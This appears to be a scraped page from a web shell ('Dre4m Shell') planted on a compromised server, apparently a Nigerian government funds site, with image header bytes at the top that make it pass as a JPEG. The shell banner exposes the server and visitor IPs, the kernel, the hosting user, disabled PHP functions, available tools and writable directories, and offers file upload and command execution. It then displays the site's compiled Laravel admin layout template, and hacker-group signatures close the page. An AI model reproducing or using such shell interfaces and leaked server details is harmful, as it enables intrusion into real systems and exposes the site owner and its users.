ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.143.25.65
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/6ce064d85d42ddbc3d4a1769bd47b6a3f5dce1e2.php
<?php
    $companyName = DB::table('report_head_logo')->where('id', 1)->first();
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title> <?php echo e(($companyName ? $companyName->company_short_name : 'Set Name')); ?> </title>
  <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <!--<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" integrity="sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB" crossorigin="anonymous">-->
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/bootstrap.min.css')); ?>">
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/notification.css')); ?>">
  <link rel="stylesheet" href="https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css">
  <link rel="stylesheet" href="<?php echo e(asset('assets/font-awesome/css/font-awesome.min.css')); ?>">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/AdminLTE.min.css')); ?>">
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/select2.min.css')); ?>">
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/_all-skins.min.css')); ?>">
  <link rel="stylesheet" href="<?php echo e(asset('assets/css/admin.css')); ?>">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.12.4/css/bootstrap-select.min.css">
  
   <style type="text/css">
    table th {
      width: auto !important;
    }
  </style>

  <script type="text/javascript" src="<?php echo e(asset('assets/js/number_to_word.js')); ?>"></script>
  <script> var murl = "<?php echo e(url('/')); ?>"; </script>
  
  <?php echo $__env->yieldContent('styles'); ?>
  
</head>
<body class="hold-transition skin-green sidebar-mini" onload="lookup();">
<div class="wrapper">
  <header class="main-header hidden-print">
    <!-- Logo -->
    <a href="<?php echo e(url('/')); ?>" class="logo">
      <span class="logo-mini">  <?php echo e(strtoupper($companyName ? $companyName->company_short_name : 'Set Name')); ?> FUNDS</span>
      <span class="logo-lg"><b> <?php echo e(strtoupper($companyName ? $companyName->company_short_name : 'Set Name')); ?> FUNDS</b></span>
    </a>
    <nav class="navbar navbar-static-top">
      <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </a>

      <div class="navbar-custom-menu">
        <ul class="nav navbar-nav">

        <?php if(count($increment) > 0): ?>
          <li class="dropdown notifications-menu">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
              <i class="fa fa-bell"></i>
              <span class="label label-warning">              
              <div style="font-size: 12px;"><?php echo e(count($increment)); ?></div>              
              </span>
            </a>
            <ul class="dropdown-menu">
              <li class="header alert alert-warning"><?php echo e(count($increment)); ?> Staff(s) Due For Increment </li>
              <li>                
                <ul class="menu">
                  <?php $__currentLoopData = $increment; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                  <li>
                    <a href="<?php echo e(url('/record-variation/view/increment')); ?>">
                      <i class="fa fa-user text-aqua"></i>
                      
                      
                    </a>
                  </li>
                  <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </ul>
              </li>
              <li class="footer"><a href="<?php echo e(url('/record-variation/view/increment')); ?>" class="text-success">View all</a></li>
            </ul>
          </li>
          <?php endif; ?>

          <?php if(count($NewStaff) > 0): ?>
          <li class="dropdown notifications-menu">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
              <i class="fa fa-user"></i>
              <span class="label label-warning">              
              <div style="font-size: 12px;"><?php echo e(count($NewStaff)); ?></div>              
              </span>
            </a>
            <ul class="dropdown-menu">
              <li class="header alert alert-warning">You have <?php echo e(count($NewStaff)); ?> New Staff(s)</li>
              <li>                
                <ul class="menu">
                  <?php $__currentLoopData = $NewStaff; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $transfer): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                  <li>
                      <a href="<?php echo e(url('/personal-emolument/new-staff')); ?>">
                        <i class="fa fa-user text-aqua"></i>
                        <?php echo e($transfer->surname. ', '.$transfer->first_name .' ('. $transfer->division .') - ' . $transfer->fileNo); ?>

                      </a>
                  </li>
                  <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </ul>
              </li>
              <li class="footer"><a href="<?php echo e(url('/personal-emolument/new-staff')); ?>" class="text-success">View all</a></li>
            </ul>
          </li>
          <?php endif; ?>
          

           <li class="user">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                <span><?php echo e(Session::get('courtName')); ?></span> 
            </a>
          </li>  

          <!--<li class="dropdown user">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
	        <i class="fa fa-envelope tab blink"><sup style="color:yellow;font-weight:bold"> 10</sup></i>
            </a>
            <ul class="dropdown-menu dropdown-user">
                 <li><a href="<?php echo e(url('/user/editAccount')); ?>"><i class="fa fa-circle-o"></i> Read</a></li>
                 <li><a href="<?php echo e(url('/logout')); ?>"><i class="fa fa-btn fa-remove"></i>Discard</a></li> 
            </ul>
          </li>  -->  
	  
          <li class="dropdown user">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                      
              <i class="fa fa-user"></i>
              <span class="hidden-xs">
              <?php if(!Auth::guest()): ?>
                <?php echo e(Auth::user()->name); ?>

              <?php endif; ?>
              </span>
            </a>
           <ul class="dropdown-menu dropdown-user">
                 <li><a href="<?php echo e(url('/user/editAccount')); ?>"><i class="fa fa-circle-o"></i> Edit Account</a></li>
                 <li><a href="<?php echo e(url('/logout')); ?>"><i class="fa fa-btn fa-sign-out"></i>Logout</a></li> 
                  </li>
               
            </ul>
          </li>          
        </ul>
      </div>
    </nav>
  </header>
 
 	 <aside class="main-sidebar hidden-print">
	    <section class="sidebar">
	      <div class="user-panel">
	        <div class="pull-left image">
	          <img src="<?php echo e(asset('Images/coat.jpg')); ?>" class="img-circle" alt="User Image">
	        </div>
	        <div class="pull-left info">
	          <p><?php echo $__env->make('MasterRolePermission.layout.getUserRoleName', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?></p>
	          <a href="#"><i class="fa fa-circle text-success"></i>online</a>          
	        </div>
	      </div>
	      <!-- Dynamic User Route for user -->
	      <?php echo $__env->make('MasterRolePermission.layout.userRouteLink', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
	      <!-- Technical Admin Route only -->
	      <?php echo $__env->make('MasterRolePermission.layout.adminRouteLink', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
	    </section>
	  </aside>

  <!-- Content Wrapper. Contains page content -->
  <div class="content-wrapper">
    <section class="content">

        <?php echo $__env->yieldContent('content'); ?>
    
    </section>
  </div>

    
  
  <!-- /.content-wrapper -->
  <footer class="main-footer hidden-print">
    <div class="pull-right hidden-xs">
      <b>Designed by</b> <a href="http://mbrcomputers.net">MBR Computer Consultants Ltd.</a>
    </div>
    <strong>Copyright &copy; <?php echo date('Y') ?> .</strong> All rights
    reserved.
  </footer>
  </div>
<!-- ./wrapper -->
<script src="<?php echo e(asset('assets/js/jQuery-2.2.0.min.js')); ?>"></script>
<script src="<?php echo e(asset('assets/js/bootstrap.min.js')); ?>"></script>
<!--<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js" integrity="sha384-smHYKdLADwkXOn1EmN1qk/HfnUcbVRZyYmZ4qpPea6sjB/pTJ0euyQp0Mk8ck+5T" crossorigin="anonymous"></script>-->
<script src="<?php echo e(asset('assets/js/app.min.js')); ?>"></script>
<script src="<?php echo e(asset('assets/js/demo.js')); ?>"></script>
<script src="<?php echo e(asset('assets/js/jquery.slimscroll.min.js')); ?>"></script>
<script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.12.4/js/bootstrap-select.min.js"></script>
<?php echo $__env->yieldContent('scripts'); ?>
<!-- <script src="<?php echo e(asset('assets/js/jquery.cookie.js')); ?>"></script> -->
</body>
</html><?php /**PATH C:\wamp64\www\funds-upgrade\funds-upgraded\resources\views/layouts/layout.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team